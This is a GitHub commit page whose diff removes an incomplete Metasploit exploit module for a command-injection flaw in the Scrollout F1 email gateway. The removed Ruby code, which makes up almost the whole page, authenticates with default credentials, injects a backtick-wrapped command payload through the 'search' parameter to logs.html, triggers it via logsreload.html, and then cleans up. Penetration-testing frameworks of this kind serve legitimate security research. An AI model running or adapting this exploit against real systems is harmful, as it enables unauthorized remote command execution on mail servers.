Permalink
Browse files

Remove scrollout_loadlogs_exec for @bcoles

  • Loading branch information...
1 parent 6412c66 commit ba0ead6915fa8367488582d0c598df33141a30f6 @wvu-r7 wvu-r7 committed Apr 22, 2017
Showing with 0 additions and 156 deletions.
  1. +0 −156 unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb
@@ -1,156 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
-
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info={})
- super(update_info(info,
- 'Name' => 'Scrollout F1 Email Gateway loadLogs Command Execution',
- 'Description' => %q{
- This module exploits a command execution vulnerability in Scrollout F1
- version 2012-10-03 which could be abused to allow authenticated users to
- execute arbitrary commands under the context of the 'www-data' user.
- The 'loadLogs' function in the 'logsreload.php' file calls 'shell_exec()'
- with user controlled data from the 'search' parameter.
- },
- 'References' =>
- [
- ['URL', 'http://itsecuritysolutions.org/2013-01-29-Scrollout-arbitrary-command-execution-vulnerability'],
- ],
- 'Author' =>
- [
- 'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
- ],
- 'License' => MSF_LICENSE,
- 'Privileged' => true,
- 'Arch' => ARCH_CMD,
- 'Platform' => 'unix',
- 'Payload' =>
- {
- 'BadChars' => "\x00",
- 'Compat' =>
- {
- 'PayloadType' => 'cmd',
- 'RequiredCmd' => 'python perl bash netcat-e',
- },
- },
- 'Targets' =>
- [
- ['Automatic Targeting', { 'auto' => true }]
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => "Jan 29 2013",
- ))
-
- register_options([
- OptBool.new('SSL', [true, 'Use SSL', false]),
- OptString.new('BasicAuthUser', [true, 'The Scrollout username', 'Admin']),
- OptString.new('BasicAuthPass', [true, 'The Scrollout password', '123456']),
- OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
- ], self.class)
- end
-
- def check
-
- peer = "#{rhost}:#{rport}"
- base = target_uri.path
- base << '/' if base[-1, 1] != '/'
- user = datastore['BasicAuthUser']
-
- # send check
- print_status("#{peer} - Authenticating as user '#{user}'")
- begin
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => "#{base}",
- })
- if res and res.code == 401
- print_error("#{peer} - Authentication failed")
- return Exploit::CheckCode::Unknown
- elsif res and res.code == 200 and res.body =~ /<title>Scrollout F1<\/title>/
- return Exploit::CheckCode::Detected
- end
- return Exploit::CheckCode::Safe
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
- print_error("#{peer} - Connection failed")
- end
- return Exploit::CheckCode::Unknown
-
- end
-
- def exploit
-
- @peer = "#{rhost}:#{rport}"
- base = target_uri.path
- base << '/' if base[-1, 1] != '/'
- command = Rex::Text.uri_encode(payload.encoded)
-
- # send payload
- print_status("#{@peer} - Sending payload (#{command.length} bytes)")
- begin
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => "#{base}logs.html",
- 'data' => "search=`#{command}`",
- })
- if res and res.code == 200
- print_good("#{@peer} - Payload sent successfully")
- elsif res and res.code == 401
- fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
- else
- fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
- end
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
- end
-
- # send payload trigger
- print_status("#{@peer} - Sending payload trigger")
- begin
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => "#{base}logsreload.html",
- })
- if res and res.code == 200
- print_good("#{@peer} - Payload trigger sent successfully")
- elsif res and res.code == 401
- fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
- else
- fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Triggering payload failed")
- end
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
- end
-
- # cleanup
- print_status("#{@peer} - Cleaning up config file (filter.cfg)")
- begin
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => "#{base}logs.html",
- 'data' => "search=",
- })
- if res and res.code == 200
- print_good("#{@peer} - Cleaning completed successfully")
- elsif res and res.code == 401
- fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
- else
- fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Cleaning failed")
- end
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
- end
-
- end
-
-end
-

0 comments on commit ba0ead6

Please sign in to comment.